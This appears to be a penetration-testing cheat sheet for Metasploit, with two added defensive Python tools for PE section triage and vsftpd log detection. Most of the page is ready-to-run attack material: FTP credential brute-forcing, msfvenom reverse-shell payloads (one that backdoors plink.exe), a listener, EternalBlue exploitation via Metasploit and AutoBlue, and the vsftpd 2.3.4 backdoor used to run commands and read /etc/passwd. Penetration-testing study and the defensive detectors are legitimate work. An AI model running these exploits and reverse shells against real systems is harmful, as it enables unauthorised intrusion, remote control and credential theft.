Hassan Saad

Exploitation

Metasploit

# Start Metasploit
systemctl start postgresql
systemctl enable postgresql
msfdb init
msfconsole

# Metasploit Modules
Auxiliary:    Modules for enumeration, scanning, fuzzing, sniffing, etc. (no payload is delivered).
Exploits:     Code that triggers a vulnerability and delivers a payload.
Payloads:     The code that runs on the target after successful exploitation.
Encoders:     Transform a payload into another encoding (e.g. to avoid bad characters).
Post:         Post-exploitation modules run on an already compromised host.
Nops:         Generate NOP (no-operation) sleds used as padding.
Evasion:      Modules that build payloads intended to evade defensive software.

# Metasploit Commands
help
show {all|exploits|payloads|auxiliary}
search vsftpd
search type:exploit smb
info {ModuleName}
use {ModuleName}
show info | show options
set {Variable} {value}
exploit

# Ex1 SNMP service enumeration
use auxiliary/scanner/snmp/snmp_enum
show info
show options
set rhosts 192.168.1.244
run

# Ex2 SMB version scanning
use auxiliary/scanner/smb/smb_version
info | options
set rhosts 192.168.1.1-254
run

# Ex3 Test FTP anonymous login
use auxiliary/scanner/ftp/ftp_login
info | options
set pass_file /root/pass.txt
set blank_passwords true
set rhosts 192.168.1.0/24
set user_file /root/user.txt
run

Client-Side Attacks

Standalone Payload

# Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f exe > file.exe

# Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f elf > file.elf

# Python
msfvenom -p python/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -o file.py

# Embedded Inside File
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f exe -x /usr/share/windows-resources/binaries/plink.exe -o embedded.exe
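
The `-x` template option above backdoors a legitimate binary, so the defender's first question about a suspicious copy of something like plink.exe is whether it still looks like the vendor built it. The following Python triage is an added example, not code from the original page and not part of Metasploit: it walks the PE section table without third-party libraries and flags sections that are both writable and executable, or that hold high-entropy data, two artefacts that injected code commonly leaves behind. The entropy threshold (7.2 bits) and minimum section size (1 KiB) are arbitrary assumptions, and the sample PE is constructed in code purely for the parser (it is not a loadable executable).

```python
# Added example (not from the original page or from Metasploit): heuristic
# PE section triage for a binary suspected of carrying an embedded payload.
import math
import random
import struct
import sys

# IMAGE_SCN_* characteristic bits from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty or constant input, 8.0 at most."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list:
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    coff = e_lfanew + 4
    num_sections, = struct.unpack_from("<H", pe, coff + 2)   # NumberOfSections
    opt_size, = struct.unpack_from("<H", pe, coff + 16)      # SizeOfOptionalHeader
    table = coff + 20 + opt_size                              # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(num_sections):
        off = table + i * 40
        name, _vsize, _vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", pe, off)
        flags, = struct.unpack_from("<I", pe, off + 36)       # Characteristics
        raw = pe[rawptr:rawptr + rawsize]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "flags": flags,
            "entropy": round(shannon_entropy(raw), 2),
            "raw_size": rawsize,
        })
    return sections


def triage(pe: bytes, entropy_threshold: float = 7.2, min_size: int = 1024) -> list:
    """Return human-readable findings for sections that deserve a second look."""
    findings = []
    for s in parse_sections(pe):
        if s["flags"] & IMAGE_SCN_MEM_WRITE and s["flags"] & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"{s['name']}: writable AND executable (RWX)")
        if s["entropy"] >= entropy_threshold and s["raw_size"] >= min_size:
            findings.append(f"{s['name']}: high entropy {s['entropy']} (packed/encrypted data?)")
    return findings


def build_sample_pe(sections: list) -> bytes:
    """Constructed minimal PE (headers + section table + raw data) for testing only."""
    e_lfanew, coff_size, opt_size = 0x40, 20, 0
    table = e_lfanew + 4 + coff_size + opt_size
    data_start = table + 40 * len(sections)
    hdr = bytearray(b"MZ" + b"\0" * (0x3C - 2)) + struct.pack("<I", e_lfanew)
    hdr += b"PE\0\0"
    # Machine=i386, NumberOfSections, TimeDateStamp, SymTab ptr, NumSyms, OptHdrSize, Characteristics
    hdr += struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    body = bytearray()
    for name, flags, raw in sections:
        ptr = data_start + len(body)
        hdr += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(raw), 0x1000,
                           len(raw), ptr, 0, 0, 0, 0, flags)
        body += raw
    return bytes(hdr) + bytes(body)


def sample_pe() -> bytes:
    """Constructed sample: a clean .text, a clean .data, and an RWX high-entropy blob."""
    rng = random.Random(7)  # deterministic stand-in for encrypted/packed content
    blob = bytes(rng.getrandbits(8) for _ in range(4096))
    return build_sample_pe([
        (b".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ, b"\x90" * 2048),
        (b".data", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE, b"A" * 1024),
        (b".rwx", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE, blob),
    ])


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else sample_pe()
    for finding in triage(data) or ["no suspicious sections"]:
        print(finding)
```

Run it with a file path to triage a real binary, or with no arguments to see the two findings it raises on the constructed sample. Treat the output as a prompt for deeper analysis, not a verdict: packers and some compilers produce high-entropy sections legitimately, and the stronger check for a vendor binary is comparing its hash and Authenticode signature against the vendor's own.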

Setup Listener

msfconsole
> use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> show options
> set LHOST 10.0.2.15
> set LPORT 4444
> exploit

Windows Service Side Attack

Exploit for MS17-010

use exploit/windows/smb/ms17_010_eternalblue
show options | show info
set rhosts 192.168.1.19
show payloads
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.114
exploit

Manual Exploit for MS17-010

git clone https://github.com/3ndG4me/AutoBlue-MS17-010
cd AutoBlue-MS17-010
cd shellcode
./shell_prep.sh
cd ..
./listener_prep.sh
python eternalblue_exploit7.py 192.168.1.4 shellcode/sc_all.bin

Linux Service Side Exploit

Exploit for vsftpd 2.3.4

use exploit/unix/ftp/vsftpd_234_backdoor
show options | show info
set rhosts 192.168.1.115
show payloads
set payload cmd/unix/interact
exploit

Manual Exploit for vsftpd 2.3.4

git clone https://github.com/In2econd/vsftpd-2.3.4-exploit
cd vsftpd-2.3.4-exploit
python3 vsftpd_234_exploit.py 192.168.1.115 21 whoami
python3 vsftpd_234_exploit.py 192.168.1.115 21 "cat /etc/passwd"
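
Both FTP passages on this page, the ftp_login scan in Ex3 and the vsftpd 2.3.4 backdoor here, leave traces in the server's own log. The following Python is an added example, not code from the original page or from either exploit project: it parses constructed lines in the vsftpd.log style (`[pid N] [user] FAIL LOGIN: Client "addr"`) and reports login guessing per client, anonymous logins that succeeded, and any username carrying the `:)` sequence that keys the vsftpd 2.3.4 backdoor, plus a banner check for that release. The sample lines and the thresholds (5 failures or 3 distinct usernames per client) are assumptions; the `:)` trigger and the 2.3.4 version are public facts about the backdoored tarball.

```python
# Added example (not from the original page): detection over vsftpd-style log
# lines for ftp_login-type guessing and for the vsftpd 2.3.4 backdoor trigger.
import re
from collections import defaultdict

# Constructed sample in vsftpd.log style (not real traffic).
SAMPLE_LOG = """\
Sun Mar  3 10:00:01 2024 [pid 1201] CONNECT: Client "10.0.2.15"
Sun Mar  3 10:00:02 2024 [pid 1201] [anonymous] OK LOGIN: Client "10.0.2.15"
Sun Mar  3 10:00:05 2024 [pid 1202] [root] FAIL LOGIN: Client "10.0.2.15"
Sun Mar  3 10:00:06 2024 [pid 1203] [admin] FAIL LOGIN: Client "10.0.2.15"
Sun Mar  3 10:00:07 2024 [pid 1204] [ftp] FAIL LOGIN: Client "10.0.2.15"
Sun Mar  3 10:00:08 2024 [pid 1205] [backup] FAIL LOGIN: Client "10.0.2.15"
Sun Mar  3 10:00:09 2024 [pid 1206] [www] FAIL LOGIN: Client "10.0.2.15"
Sun Mar  3 10:05:30 2024 [pid 1230] [alice] OK LOGIN: Client "192.168.1.50"
Sun Mar  3 10:06:00 2024 [pid 1231] [alice] FAIL LOGIN: Client "192.168.1.50"
Sun Mar  3 10:09:12 2024 [pid 1240] CONNECT: Client "10.0.2.15"
Sun Mar  3 10:09:13 2024 [pid 1240] [xyz:)] FAIL LOGIN: Client "10.0.2.15"
"""

# Timestamp, pid, optional [username], event, client address. Other events are skipped.
LINE_RE = re.compile(
    r'^(?P<ts>.+?) \[pid \d+\] (?:\[(?P<user>[^\]]*)\] )?'
    r'(?P<event>CONNECT|OK LOGIN|FAIL LOGIN): Client "(?P<client>[^"]+)"'
)


def parse_log(text: str) -> list:
    """Parse vsftpd-style lines into dicts; lines that do not match are ignored."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def detect_login_guessing(events: list, fail_threshold: int = 5, user_threshold: int = 3) -> list:
    """Per client: many failed logins, or failures spread over many usernames (spraying)."""
    fails = defaultdict(int)
    users = defaultdict(set)
    for e in events:
        if e["event"] == "FAIL LOGIN":
            fails[e["client"]] += 1
            users[e["client"]].add(e["user"])
    findings = []
    for client, n in sorted(fails.items()):
        if n >= fail_threshold or len(users[client]) >= user_threshold:
            findings.append(f"{client}: {n} failed logins across {len(users[client])} usernames")
    return findings


def detect_anonymous_logins(events: list) -> list:
    """Clients that successfully logged in as 'anonymous' (what Ex3's blank-password test finds)."""
    return sorted({e["client"] for e in events
                   if e["event"] == "OK LOGIN" and e["user"] == "anonymous"})


def detect_backdoor_trigger(events: list) -> list:
    """The vsftpd 2.3.4 backdoor is keyed on a ':)' inside the USER argument."""
    return [(e["client"], e["user"]) for e in events if e["user"] and ":)" in e["user"]]


def banner_is_vulnerable(banner: str) -> bool:
    """True when a 220 greeting advertises exactly vsFTPd 2.3.4, the backdoored release."""
    m = re.search(r"vsFTPd ([\d.]+)", banner)
    return bool(m) and m.group(1) == "2.3.4"


def analyse(text: str) -> dict:
    events = parse_log(text)
    return {
        "login_guessing": detect_login_guessing(events),
        "anonymous_logins": detect_anonymous_logins(events),
        "backdoor_triggers": detect_backdoor_trigger(events),
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_LOG).items():
        print(f"{key}: {value}")
    print("banner 220 (vsFTPd 2.3.4) vulnerable:", banner_is_vulnerable("220 (vsFTPd 2.3.4)"))
```

Feed `analyse()` the contents of `/var/log/vsftpd.log` (or the equivalent path on your distribution) to run it over real data. A backdoor-trigger hit on a host that still runs 2.3.4 should be followed by a check for an unexpected listener on TCP port 6200, which is the shell the trigger opens; the durable fix is upgrading past 2.3.4, and the login-guessing rule is best paired with a connection rate limit on the FTP service.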

Last updated 2 years ago